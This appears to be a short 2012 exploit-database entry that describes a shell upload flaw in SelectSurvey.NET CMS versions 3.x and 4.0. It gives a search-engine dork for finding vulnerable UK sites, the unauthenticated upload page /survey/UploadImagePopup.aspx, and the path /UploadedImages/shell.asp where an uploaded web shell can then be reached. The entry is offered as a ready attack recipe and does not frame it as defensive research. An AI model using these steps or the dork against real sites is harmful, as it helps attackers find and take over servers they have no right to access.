SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload

EKU-ID: 29009	CVE:	OSVDB-ID:
Author: 040	Published: 2012-12-21	Verified:
Download:

Rating

☆☆☆☆☆

=============================================================
SelectSurvey CMS (ASP.NET) Shell Upload Vulnerability
=============================================================

###################################################
#
# Exploit Title: SelectSurvey.NETv4 CMS (ASP.NET) Shell Upload Vulnerability
# DDate: 20/12/2012
# Author: 040
# Software Link: www.classapps.com
# Version: 3.x . 4.0
# Tested on: windows
# dork : "SelectSurvey.NETv4 site:uk"
# Contact: cyber040@hotmail.com ~ @04hazmi
#
####################################################

    exploit # /survey/UploadImagePopup.aspx

or http://survey.site.com/UploadImagePopup.aspx


  Upload to # http://site.com/UploadedImages/shell.asp


#######################################################


Greetz :  Matlo3a-Dz